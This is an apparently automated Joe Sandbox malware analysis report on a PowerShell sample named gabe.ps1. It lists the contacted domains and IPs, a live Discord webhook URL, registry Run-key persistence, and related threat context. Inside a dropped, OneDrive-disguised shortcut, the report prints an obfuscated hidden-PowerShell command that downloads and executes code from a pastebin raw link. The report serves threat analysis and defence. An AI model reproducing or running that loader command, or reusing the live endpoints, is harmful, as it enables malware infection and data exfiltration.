                        https://go.micropowershell.exe, 00000000.00000002.1687945828.0000027109712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D2020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC5D8A000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: safe
                        		unknown
                        https://discord.com/api/webhooks/129575196622756powershell.exe, 00000007.00000002.1822947062.000001D203051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6D2E000.00000004.00000800.00020000.00000000.sdmptrue
                          		unknown
                          http://www.microsoft.copowershell.exe, 00000000.00000002.1718524560.0000027120920000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000000.00000002.1713569530.00000271188AA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.1713569530.00000271188AA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://discord.compowershell.exe, 00000000.00000002.1687945828.0000027108CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D203051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1687945828.0000027108916000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://raw.githubusercontent.compowershell.exe, 00000007.00000002.1822947062.000001D202699000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6379000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewvpowershell.exe, 0000000C.00000002.1906348884.0000020AC6454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6318000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC644A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6446000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC642D000.00000004.00000800.00020000.00000000.sdmp, gabe.ps1true
                                    		unknown
                                    https://contoso.com/powershell.exe, 00000000.00000002.1713569530.00000271188AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1713569530.0000027118768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1713569530.00000271188AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://raw.githubusercontent.compowershell.exe, 00000007.00000002.1822947062.000001D202699000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6379000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.1687945828.00000271086F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D201BEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D201BFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC58CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC58DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1687945828.00000271086F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D201C25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC58A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://pastebin.compowershell.exe, 00000007.00000002.1822947062.000001D2020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D20261C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D2025FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC62FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC602A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC62DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://pastebin.compowershell.exe, 00000007.00000002.1822947062.000001D20260A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC62EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.20.3.235
                                          		pastebin.comUnited States
                                          		13335CLOUDFLARENETUStrue
                                          162.159.137.232
                                          		discord.comUnited States
                                          		13335CLOUDFLARENETUStrue
                                          104.20.4.235
                                          		unknownUnited States
                                          		13335CLOUDFLARENETUSfalse
                                          185.199.109.133
                                          		raw.githubusercontent.comNetherlands
                                          		54113FASTLYUStrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1534233
                                          Start date and time:2024-10-15 18:05:11 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 28s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:16
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:gabe.ps1
                                          Detection:MAL
                                          Classification:mal84.troj.evad.winPS1@16/15@4/4
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 92%
                                          • Number of executed functions: 12
                                          • Number of non-executed functions: 5
                                          Cookbook Comments:
                                          • Found application associated with file extension: .ps1

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • VT rate limit hit for: gabe.ps1

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          12:06:15API Interceptor384x Sleep call for process: powershell.exe modified
                                          18:06:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                          18:06:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          104.20.3.235cr_asm.ps1Get hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          sostener.vbsGet hashmaliciousNjratBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          sostener.vbsGet hashmaliciousRemcosBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          162.159.137.232OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                              gaber.ps1Get hashmaliciousUnknownBrowse
                                                0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                  SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                    WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                      main.bat.bin.batGet hashmaliciousDiscord RatBrowse
                                                        Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                          https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH-Get hashmaliciousHTMLPhisherBrowse
                                                            http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                              104.20.4.235cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • pastebin.com/raw/sA04Mwk2
                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                              • pastebin.com/raw/sA04Mwk2
                                                              OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                              • pastebin.com/raw/sA04Mwk2
                                                              gaber.ps1Get hashmaliciousUnknownBrowse
                                                              • pastebin.com/raw/sA04Mwk2
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • pastebin.com/raw/sA04Mwk2
                                                              sostener.vbsGet hashmaliciousNjratBrowse
                                                              • pastebin.com/raw/V9y5Q5vv
                                                              sostener.vbsGet hashmaliciousXWormBrowse
                                                              • pastebin.com/raw/V9y5Q5vv
                                                              envifa.vbsGet hashmaliciousRemcosBrowse
                                                              • pastebin.com/raw/V9y5Q5vv
                                                              New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                              • pastebin.com/raw/NsQ5qTHr
                                                              Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                              • pastebin.com/raw/NsQ5qTHr

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              raw.githubusercontent.comaidjBV.ps1Get hashmaliciousUnknownBrowse
                                                              • 185.199.110.133
                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                              • 185.199.108.133
                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                              • 185.199.110.133
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • 185.199.111.133
                                                              na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                              • 185.199.109.133
                                                              65567 DHL 647764656798860.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                              • 185.199.109.133
                                                              Request for Order Confirmation.jsGet hashmaliciousUnknownBrowse
                                                              • 185.199.110.133
                                                              RrEf8Rui72.exeGet hashmaliciousUnknownBrowse
                                                              • 185.199.109.133
                                                              Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                                              • 185.199.108.133
                                                              Image_Attachments.xlsGet hashmaliciousRemcosBrowse
                                                              • 185.199.109.133
                                                              discord.comaidjBV.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.135.232
                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.136.232
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.128.233
                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.136.232
                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.136.232
                                                              VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                              • 162.159.138.232
                                                              OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.137.232
                                                              5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                              • 162.159.128.233
                                                              HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                              • 162.159.136.232
                                                              pastebin.comcr_asm.ps1Get hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • 104.20.4.235
                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                              • 104.20.4.235
                                                              VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                              • 172.67.19.24
                                                              OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                              • 104.20.4.235
                                                              xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.19.24

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUSaidjBV.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.135.232
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                              • 104.21.53.8
                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.136.232
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.135.232
                                                              cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.37.123
                                                              https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              Play_New_001min 11sec _ ATT20283(David.dekraker).htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.25.14
                                                              CLOUDFLARENETUSaidjBV.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.135.232
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                              • 104.21.53.8
                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.136.232
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.135.232
                                                              cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.37.123
                                                              https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              Play_New_001min 11sec _ ATT20283(David.dekraker).htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.25.14
                                                              CLOUDFLARENETUSaidjBV.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.135.232
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                              • 104.21.53.8
                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.136.232
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • 162.159.135.232
                                                              cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                              • 172.67.37.123
                                                              https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              Play_New_001min 11sec _ ATT20283(David.dekraker).htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.25.14

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0eaidjBV.ps1Get hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              • 162.159.137.232
                                                              • 104.20.4.235
                                                              • 185.199.109.133
                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              • 162.159.137.232
                                                              • 104.20.4.235
                                                              • 185.199.109.133
                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              • 162.159.137.232
                                                              • 104.20.4.235
                                                              • 185.199.109.133
                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                              • 104.20.3.235
                                                              • 162.159.137.232
                                                              • 104.20.4.235
                                                              • 185.199.109.133
                                                              na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                              • 104.20.3.235
                                                              • 162.159.137.232
                                                              • 104.20.4.235
                                                              • 185.199.109.133
                                                              cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 104.20.3.235
                                                              • 162.159.137.232
                                                              • 104.20.4.235
                                                              • 185.199.109.133
                                                              z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              • 104.20.3.235
                                                              • 162.159.137.232
                                                              • 104.20.4.235
                                                              • 185.199.109.133
                                                              wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              • 104.20.3.235
                                                              • 162.159.137.232
                                                              • 104.20.4.235
                                                              • 185.199.109.133
                                                              3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              • 104.20.3.235
                                                              • 162.159.137.232
                                                              • 104.20.4.235
                                                              • 185.199.109.133
                                                              z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              • 104.20.3.235
                                                              • 162.159.137.232
                                                              • 104.20.4.235
                                                              • 185.199.109.133

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                              Category:dropped
                                                              Size (bytes):1728
                                                              Entropy (8bit):4.527272298423835
                                                              Encrypted:false
                                                              SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                              MD5:724AA21828AD912CB466E3B0A79F478B
                                                              SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                              SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                              SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                              Malicious:true
                                                              Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):11608
                                                              Entropy (8bit):4.890472898059848
                                                              Encrypted:false
                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                              Malicious:false
                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:Nllluln52llp:NllUol
                                                              MD5:DD1511ADD69A2BBFD772EE49C6828FBD
                                                              SHA1:D446C5D5B1209CCE7FA673473F913DB360F5931A
                                                              SHA-256:C687FDA1A7A70346FE15F2420682B39C0185696575E46E9785C150FC06D3A629
                                                              SHA-512:46A7C2240420741311A83BE91CC32B224ABA2100DA18302F8347D5CA4DAB58B7B5CE81591D0BBCCB63C38004D49249850E35A7F8F72232072F0126EB9891FEE4
                                                              Malicious:false
                                                              Preview:@...e................................................@..........

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gbjsimj.mzz.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cm2c0qq1.s0i.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crvd5ltm.hg0.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
